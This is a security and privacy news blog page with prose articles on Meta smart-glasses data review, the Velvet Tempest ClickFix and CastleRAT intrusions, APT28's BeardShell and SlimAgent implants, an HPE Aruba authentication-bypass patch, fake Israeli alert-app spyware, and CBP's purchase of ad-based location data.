Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Latest News

Russian Cyber Campaign Targets Signal and WhatsApp Users Through Social Engineering Tactics

  Hackers believed to be linked to Russia are attempting to gain access to Signal and WhatsApp accounts of government officials, journalist...

All the recent news you need to know
Privacy
AI Data Governance Artificial Intelligence Data Regulation DPDP Act India Meta Privacy

Meta’s Smart Glasses Face Privacy Backlash as Experts Flag Legal and Ethical Risks

 



A whirlwind of concerns around Meta’s AI-enabled smart glasses are intensifying after reports suggested that human reviewers may have accessed sensitive user recordings, raising broader questions about privacy, consent, and data protection.

Online discussions have surged, with users expressing alarm over how much data may be visible to the company. Some individuals on forums have claimed that recorded footage could be manually reviewed to train artificial intelligence systems, while others raised concerns about the use of such devices in sensitive environments like healthcare settings, where patient information could be unintentionally exposed.


What triggered the controversy?

The debate gained momentum following an investigation by Swedish media outlets, which reported that contractors working at external facilities were tasked with reviewing video recordings captured through Ray-Ban Meta Smart Glasses. According to these findings, some of the reviewed material included highly sensitive content.

The issue has since drawn regulatory attention in multiple regions. Authorities in the United Kingdom, including the Information Commissioner's Office, have sought clarification on how such user data is processed. In the United States, the controversy has also led to legal action against Meta Platforms, with allegations that consumers were not adequately informed about the device’s privacy safeguards.

The timing is of essence here, as smart glasses are rapidly gaining popularity. Legal filings suggest that more than seven million units were sold in 2025 alone. Unlike smartphones, these glasses resemble regular eyewear but can discreetly capture images, audio, and video from the wearer’s perspective, often without others being aware.


Why are experts concerned?

Legal analysts highlight that such practices could conflict with India’s Digital Personal Data Protection Act, 2023 if data involving Indian individuals is collected.

According to legal experts, consent remains a foundational requirement. Any access to recordings involving identifiable individuals must be based on informed approval. If footage is reviewed without the knowledge or permission of those captured, it could constitute a violation of Indian data protection law.

Beyond legality, specialists argue that wearable AI devices introduce a deeper structural issue. Unlike traditional data collection methods, these tools continuously capture real-world environments, making it difficult to define clear boundaries for data usage.

Experts also point out that although Meta includes visible indicators such as LED lights to signal recording, these measures do not fully address how the data of bystanders is processed. There are concerns about the absence of strict limitations on why such data is collected or how much of it is retained.

Additionally, outsourcing the review of user-generated content introduces further complications. Apart from the risk of misuse or unauthorized sharing, there are also ethical concerns regarding the working conditions and psychological impact on individuals tasked with reviewing potentially distressing material.


Cross-border and systemic risks

Another key concern is international data handling. If recordings involving Indian users are accessed by contractors located overseas, companies are still expected to maintain the same standards of security and confidentiality required under Indian regulations.

Experts emphasize that these devices are part of a much larger artificial intelligence ecosystem. Data captured through smart glasses is not simply stored. It may be uploaded to cloud servers, processed by machine learning systems, and in some cases, reviewed by humans to improve system performance. This creates a chain of data handling where highly personal information, including facial features, voices, surroundings, and behavioral patterns, may circulate beyond the user’s direct control.


What is Meta’s response?

Meta has stated that protecting user data remains a priority and that it continues to refine its systems to improve privacy protections. The company has explained that its smart glasses are designed to provide hands-free AI assistance, allowing users to interact with their surroundings more efficiently.

It also acknowledged that, in certain cases, human reviewers may be involved in evaluating shared content to enhance system performance. According to the company, such processes are governed by its privacy policies and include steps intended to safeguard user identity, such as automated filtering techniques like face blurring.

However, reports citing Swedish publications suggest that these safeguards may not always function consistently, with some instances where identifiable details remain visible.

While recording must be actively initiated by the user, either manually or through voice commands, experts note that many users may not fully understand that their captured content could be subject to human review.


The Ripple Effect

This controversy reflects a wider shift in how personal data is generated and processed in the age of AI-driven wearables. Unlike earlier technologies, smart glasses operate in real time and in shared environments, raising complex questions about consent not just for users, but for everyone around them.

As adoption runs rampant, regulators worldwide are likely to tighten scrutiny on such devices. The challenge for companies will be to balance innovation with transparent data practices, especially as public awareness around digital privacy continues to rise.

For users, this is a wake up call to not rely on new age technology blindly and take into account that convenience-driven technologies often come with hidden trade-offs, particularly when it comes to control over personal data.

Read more »
Velvet Tempest
CastleRAT ClickFix Cyber Attacks Termite Ransomware Velvet Tempest

Termite Ransomware Linked to Velvet Tempest's ClickFix, CastleRAT Attacks

 

Cyber threat actors known as Velvet Tempest have been observed deploying sophisticated attacks involving Termite ransomware, utilizing the ClickFix social engineering technique and the CastleRAT backdoor.These intrusions, tracked by MalBeacon researchers, unfolded over 12 days in a simulated U.S. non-profit environment with over 3,000 endpoints.Velvet Tempest, active for at least five years, has affiliations with major ransomware strains like Ryuk, REvil, Conti, BlackCat, LockBit, and RansomHub. 

The attacks begin with malvertising campaigns directing victims to fake CAPTCHA pages that trick users into pasting obfuscated PowerShell commands into the Windows Run dialog This ClickFix method bypasses browser security features, chaining cmd.exe processes and using legitimate tools like finger.exe to fetch malware loaders, often disguised as PDF archives.Subsequent stages involve PowerShell downloads, .NET compilation via csc.exe, and Python-based persistence in ProgramData directories. 

Once inside, attackers conduct Active Directory reconnaissance, host discovery, and credential harvesting from Chrome browsers using hosted PowerShell scripts linked to Termite staging servers. They deploy DonutLoader to retrieve CastleRAT, a remote access trojan that steals credentials, logs keystrokes, captures screens, and employs UAC bypass via trusted binaries like ComputerDefaults.exe. CastleRAT hides its command-and-control servers using Steam Community profiles as dead-drop resolvers, blending traffic with legitimate web activity. 

Although ransomware deployment was not observed in this intrusion, Termite—a Babuk-based variant emerged in late 2024—employs double-extortion by exfiltrating data before encrypting files. It deletes shadow copies with vssadmin.exe, empties the Recycle Bin, and targets high-profile victims like SaaS provider Blue Yonder and Australian IVF firm Genea. The group exploits vulnerabilities, such as those in Cleo's file transfer software, for initial access via phishing or compromised sites. 

Organizations should prioritize defenses against ClickFix by training users on suspicious prompts, monitoring PowerShell abuse, and blocking anomalous tool executions like finger.exe or csc.exe. Implementing deception environments, as used by MalBeacon, aids early detection of such hands-on-keyboard activities. With Velvet Tempest's history of devastating breaches, vigilance against evolving ransomware tactics remains critical in 2026.
Read more »
SlimAgent
Advanced Persistent Threat APT28 BeardShell Cloud Based C2 Covenant Malware Cyber Attacks cyber espionage Office Exploits SlimAgent

APT28 Deploys Enhanced Version of Covenant in Ongoing Threat Activity


 

In recent months, the contours of cyber warfare have once again become clearer as APT28 - an agent of Russian intelligence that has operated in Ukraine for a number of years - elicits renewed precision and technological sophistication in its operations against Ukrainian defense networks. 

Fancy Bear has been referred to by multiple aliases, including Sednit, Forest Blizzard, Unit 26165, and TA422, throughout the cybersecurity community due to its ability to adapt to geopolitical objectives when necessary. With its latest campaign, APT28 has implemented a dual-pronged malware strategy based on innovation and intent. 

The company has deployed an undocumented backdoor, BEARDSHELL, alongside a heavily customized implementation of the open-source post-exploitation framework COVENANT, which has been heavily customized. 

The development indicates a calculated effort to refine persistence, avoid detection, and gain deeper operational footholds in sensitive military environments by modifying tactics, evading detection, and improving operational capabilities. 

Designed specifically for stealth and long-term access, BEARDSHELL works in conjunction with the modified COVENANT toolkit, which has been modified to better suit the group's command-and-control requirements and operational procedures. Combined, these tools represent a growing trend toward modular and adaptable malware ecosystems that can be tailored to specific target and mission requirements. 

It is becoming increasingly apparent that as the conflict in Ukraine continues to escalate into the digital realm, state-backed actors are utilizing cyber capabilities in a variety of ways, often invisible but profoundly consequential, to gather intelligence and shape the strategic landscape. 

The campaign illustrates a tightly coordinated intrusion chain designed to penetrate Ukrainian military and government networks with minimal friction and maximum persistence based on this operational shift. 

Based on the investigations conducted, it has been determined that the activities attributed to APT28 are mainly directed towards central executive bodies, where access to strategic communications and operational data provides a valuable source of information. 

As part of the initial compromise, spear-phishing lures are developed that masquerade as routine administrative or defense correspondence, distributed via email as well as encrypted messaging channels such as Signal, which are often distributed using spear-phishing lures. Upon opening the weaponized Office documents, these messages initiate a fileless infection sequence that is designed to evade conventional endpoint defenses. 

It is comprised of a memory-resident backdoor derived from a substantially altered variant of the Covenant framework which has been repurposed to serve as a discreet loader for further payloads. During this stage, bespoke implants, such as BeardShell and SlimAgent, are deployed.

The latter bears architectural resemblance to the earlier XAgent toolkit developed by the group in the past. The combination of these components creates a robust surveillance environment within compromised systems, facilitating continuous data collection of keystrokes, screen captures, and clipboards. 

Exfiltrating intelligence is organized into HTML-based logs that include color-coded segmentation for rapid parsing and prioritization by operators. It is noteworthy that the group has implemented a command-and-control infrastructure that meets their requirements. A number of cloud storage platforms, including pCloud, Koofr, Filen, and Icedrive, are used by the attackers to relay instructions and store stolen data rather than using servers that are easily identifiable. 

As a result, malicious activity is blended with routine user activity, resulting in significantly tampering with detection efforts. Based on the forensic analysis of these cloud-linked accounts, it has been determined that certain Ukrainian systems have been continuously monitored for extensive periods of time, demonstrating APT28's ability to collect intelligence in high-value environments in a low-visibility manner. 

Moreover, the researchers at ESET have provided additional technical insight into the operation, tracing its deployment to at least April 2024, when a structured, sustained intrusion effort began. According to their findings, the coordinated use of BeardShell and Covenant was not an accident, but intentionally designed to provide prolonged, low-noise surveillance of Ukrainian military personnel and government organizations. 

Recent incidents have indicated that the infection chain exploits a vulnerability tracked as CVE-2026-21509, which is embedded within malicious DOC files designed to execute code upon opening. In the end, SlimAgent, a surveillance-focused implant that was identified within a compromised Ukrainian government system, enabled the discovery of this implant, which was capable of collecting keystrokes, clipboard contents, and screen captures systematically without causing immediate suspicion. 

According to the subsequent analysis, BeardShell is a modern, modular backdoor that emphasizes stealth and flexibility. Icedrive's infrastructure is utilized to communicate with commands and controls. Remote PowerShell commands are executed within a managed .NET runtime environment using this infrastructure. 

An obfuscation method previously associated with Xtunnel, a network pivot utility historically connected to APT28's earlier campaigns is included in its internal design, demonstrating a deliberate reuse of proven techniques. Meanwhile, the Covenant framework is used as the primary operational implant, having been reworked from its original open-source version. 

There have also been changes observed in the generation of deterministic identifiers linked to host-specific attributes, in the execution logic intended to bypass behavioral detection engines, as well as the integration of cloud-based communication channels. As part of the group's infrastructure strategy, Koofr and pCloud have gradually been replaced by newer platforms such as Filen beginning mid-2025. 

As a result of this architecture, Covenant serves as the primary access mechanism, while BeardShell serves as a contingency tool to ensure operations continue even in cases of partial detection or remediation. Further extending the scope of the analysis, researchers have also highlighted that the threat actor's toolkit reflects a deliberate blend of legacy codebases and newly developed capabilities, reflecting a deliberate combination of heritage codebases and newly developed capabilities. 

SLIMAGENT, an implant that was formally disclosed by the CERT-UA in mid-2025 and examined in greater detail by ESET in the following year. With SLIMAGENT, granular data collection is possible through keystroke logging, screenshot capture, and clipboard harvesting, effectively turning compromised systems into persistent intelligence gathering nodes. It is designed for continuous data collection with granular data collection capabilities. 

SLIMAGENT is distinguished by more than its functionality; it is also distinguished by its lineage. Based on technical comparisons, SLIMAGENT does not appear to be a completely new development, but rather is an evolution of APT28's earlier XAgent toolset, which was widely deployed by the group during the 2010s. 

In support of this assessment, code-level similarities have been identified across multiple samples, including artifacts recovered from early-2018 intrusion campaigns targeting European governmental entities. Moreover, the correlation between the keylogging routines and an XAgent variant observed in late 2014 suggests an ongoing development rather than a one-time invention of the routines, suggesting continuity of development. The structured formatting of exfiltrated data remains one of the most distinctive features across these generations. 

The SLIMAGENT surveillance software, like its predecessor, compiles its output into HTML-formatted logs, utilizing a consistent color code scheme to distinguish between application identification numbers, captured keystrokes, and active window titles. As a result of this seemingly inconsequential design choice, operators now benefit from a streamlined interface to speed up the data triage process, thereby reinforcing the campaign's operational efficiency.

Additionally, BEARDSHELL's backdoor function as an execution layer within the compromised environment, facilitating remote command delivery via PowerShell within a controlled .NET environment in conjunction with SLIMAGENT's data collection capabilities. 

By relying on Icedrive for command-and-control, the group maintains covert access while minimizing detection risk while continuing its emphasis on blending malicious activity with legitimate network traffic. All of these findings reinforce that organizations operating in geopolitical environments characterized by high levels of risk, particularly those within the government and defense sectors, need to recalibrate their defensive posture.

There is a need for security teams to adopt behavior-driven monitoring as an alternative to traditional signature-based detection models to identify anomalous processes, in-memory payload delivery, and misuse of legitimate cloud services. 

In addition to stricter controls on macro execution and file provenance, it is essential to scrutinize document-based attack vectors, particularly those exploiting known vulnerabilities like CVE-2026-21509. 

Meanwhile, the increasing use of trusted cloud platforms for command-and-control activities underscores the significance of maintaining visibility into outbound network traffic and implementing zero-trust principles to restrict lateral movement.

A coordinated threat hunt in conjunction with timely intelligence sharing among national and international cybersecurity bodies will be essential in combating such campaigns. With adversaries continuing to combine legacy techniques with modern infrastructure to refine their toolchains, resilience will depend on defenders' abilities to anticipate and adapt to an environment that is becoming increasingly covert and persistent.
Read more »
data security
Authentication Bypass authentication bypass flaw Compromised Passwords Cyber Security Cyber Vulnerabilities cybersecurity vulnerabilities data security

HPE Patches Critical Aruba AOS-CX Vulnerabilities Including Authentication Bypass Flaw

 

Hewlett Packard Enterprise (HPE) has released security updates to address multiple vulnerabilities in its Aruba AOS-CX network operating system, including a critical flaw that could allow attackers to bypass authentication and gain administrative control. 

AOS-CX comes from Aruba Networks, a part of HPE, built specifically for cloud-based networking needs. These systems run on CX-series switches found in big company campuses and data centers. Because so many rely on them, any flaws present serious concerns when discovered. 

What stands out is CVE-2026-23813 - a severe flaw tied to how AOS-CX switches handle login security via their web portal. HPE confirms that hackers could abuse this weakness from afar, needing no prior access nor advanced skills. Control over compromised devices might follow, including forced changes to admin credentials. Though simple to trigger, the outcome carries heavy risk. Such exposure emerges solely through network interaction. Little effort may yield full system override. 

Security hinges on timely updates, yet patch details remain sparse. Remote manipulation becomes feasible once entry points open. Without safeguards, unintended access escalates quickly. This condition persists until corrective measures apply. Come mid-advisory, the firm stated they’d seen no signs of real-world attacks nor any public tools built to exploit these flaws. Still, given how serious the weakness happens to be, rolling out fixes quickly becomes a top priority for most teams. 

When updates cannot happen right away, HPE suggests ways to lower exposure. One path involves isolating management ports inside private network zones. Access rules should be tightly defined, minimizing who can connect. Unneeded web-based entry points over HTTP or HTTPS ought to be turned off completely. Trust boundaries may also tighten by using ACLs that allow only known devices to interact. 

Watching system logs closely adds another layer - unexpected login efforts often show up there first. Security weaknesses fit into a wider trend of issues HPE has tackled lately. Back in July 2025, hidden login details emerged in Aruba Instant On wireless units, opening doors for unauthorized access. Before that, fixes rolled out for several problems in the StoreOnce data protection system - some let intruders skip verification steps entirely. Remote control exploits also surfaced, giving hackers potential command over affected machines. 

More recently, the Cybersecurity and Infrastructure Security Agency (CISA) flagged a high-severity vulnerability in HPE OneView as actively exploited in the wild, underscoring the growing focus of threat actors on enterprise infrastructure tools. With more than 55,000 enterprise clients worldwide, HPE points out that timely updates and stronger network defenses help reduce risks. Many of these clients appear on the Fortune 500 list, highlighting the scale of exposure when security lapses occur. Because threats evolve quickly, waiting is rarely an option. 

Instead, consistent maintenance becomes a quiet but steady shield. Even small delays can widen vulnerabilities across complex systems. When flaws appear in network management tools, specialists warn these often pose high risk - attackers might gain extensive access across company systems. Without immediate fixes, even unused weaknesses invite trouble down the line. 

Updates applied quickly, combined with multiple protective layers, help reduce potential harm before incidents occur. When companies depend heavily on unified network systems, events such as these reveal how crucial it is to maintain constant oversight while reacting quickly when new risks appear.
Read more »
Isreal
Bypass of Sensitive data. Cyber Security Data Hackers data security Data Theft Hacker attack Isreal

Spyware Disguised as Safety App Targets Israelis Amid Rising Cyber Espionage Activity

 

A fresh wave of digital spying has emerged, aiming at people within Israel through fake apps made to look like official warning tools. Instead of relying on obvious tricks, it uses the credibility of public alerts to encourage downloads of harmful programs. 

Cyber experts highlight how these disguised threats pretend to offer protection while actually stealing information. Trust in urgent notifications becomes the weak spot exploited here. What seems helpful might carry hidden risks beneath its surface. Noticed first by experts at Acronis, the operation involves fake texts mimicking alerts from Israel’s Home Front Command - an IDF division. 

Instead of genuine warnings, these messages push a counterfeit app update for civilian missile notifications. While seeming official, the link leads to malicious software disguised as protection tools. Rather than safety, users face digital risks when installing the altered program. Falling for the guide, people install spyware rather than a genuine program. The harmful software can harvest exact whereabouts, texts, stored credentials, phone directories, along with private files kept on the gadget, experts say. Years of activity mark this group within cyber intelligence circles. 

Thought to connect with Arid Viper, the operation fits patterns seen before. Targets often include Israeli military figures, alongside people in areas like Egypt and Palestine. Instead of complex tools, they lean on social engineering to spread malicious software. Their methods persist over time, adapting without drawing attention. What stands out is the level of preparation seen in the attackers, according to Acronis. Their operations show a clear aim, targeting systems people rely on when tensions rise between nations. 

Instead of random strikes, these actions follow a pattern meant to blend in. Official-looking messages appear during crises, shaped like real alerts. Because they resemble legitimate warnings, users are more likely to respond without suspicion. Infrastructure once seen as safe now becomes a vector - simply because it's trusted at critical moments. 

A fresh report from Check Point Software Technologies reveals cyberattacks targeting surveillance cameras in Israel and neighboring areas of the Middle East. These intrusions point toward coordinated moves to collect data while possibly preparing to interfere with essential infrastructure. Cyber operations have emerged alongside rising friction after documented strikes by U.S. and Israeli forces on locations inside Iran. 

In response, several groups aligned with Tehran have stated they carried out digital intrusions aimed at both official Israeli bodies and corporate networks. Even so, specialists observe that such assaults still lack major influence on the overall struggle. Yet, as nations lean more heavily on hacking methods, it becomes clear - cyber tactics now weave tightly into global power contests. When links arrive unexpectedly, skipping the download is wise - trust matters less than origin. 

Official storefronts serve as safer gateways compared to random web prompts. Messages mimicking familiar brands often hide traps beneath clean designs. Jumping straight to installation bypasses crucial checks best left intact. Verified platforms filter out many hostile imitations by design. Risk shrinks when access follows established paths instead of sudden urges. 

When emergencies strike, cyber threats tend to rise - manipulating panic instead of logic. Pressure clouds judgment, creating openings for widespread breaches. Urgency becomes a tool, not a shield, in these moments. Digital attacks grow sharper when emotions run high. Crises rarely pause harm; they invite it.
Read more »
Phone Tracking
Ad Data Privacy CBP Cyber Security Location Brokers Phone Tracking

CBP Admits Buying Ad Data to Secretly Track Phone Locations

 

U.S. Customs and Border Protections (CBP) has confessed to buying phone location data from the online advertising world, with the purchase making it now the first government agency to confirm such practices. The disclosure was made in a Privacy Threshold Analysis document from 2019 to 2021 that 404 Media obtained via a Freedom of Information Act request and describing a proof-of-concept trial. The data, embedded in real-time bidding (RTB) mechanisms in apps, can be used to track people’s movements with great precision, unbeknownst to them. 

Real-time bidding is what drives the ads that users see in mobile apps, where advertisers bid in real time to display targeted content. In these auctions, mysterious advertising tech companies are peddling tens of thousands of apps, including popular games like Candy Crush and fitness trainers like MyFitnessPal, collecting device identifiers, app usage, and geolocation data. That information is packaged and resold, and tracking it creates a “gold mine” of delivery because it exposes daily routines, home addresses and places of work. 

CBP’s use of such data is troubling from a privacy standpoint, as it circumvent traditional warrants and has access to an ecosystem that most users don’t actually agree to use. The agency evaluated the technology to track activity close to borders, but would not say whether it still uses the method after queries. Related agencies, such as Immigration and Customs Enforcement, have sought to procure similar tools, like Webloc, which allows users to track phones on a neighborhood scale. 

This incident highlights broader government reliance on commercial data brokers for surveillance, echoing past revelations about low-cost ad-based location spying. Apps from dating services to social networks unwittingly feed this pipeline, often without developers' awareness. Critics argue it erodes Fourth Amendment protections, enabling mass tracking under the guise of national security. 

As digital ad ecosystems expand, regulators face pressure to curb these hidden data flows before they normalize warrantless monitoring. Users can mitigate risks by limiting app permissions, using VPNs, and supporting privacy laws like those targeting data brokers. Policymakers must now scrutinize how border security intersects with everyday app usage to safeguard civil liberties in an ad-driven world.
Read more »
Subscribe to: Comments (Atom)

Featured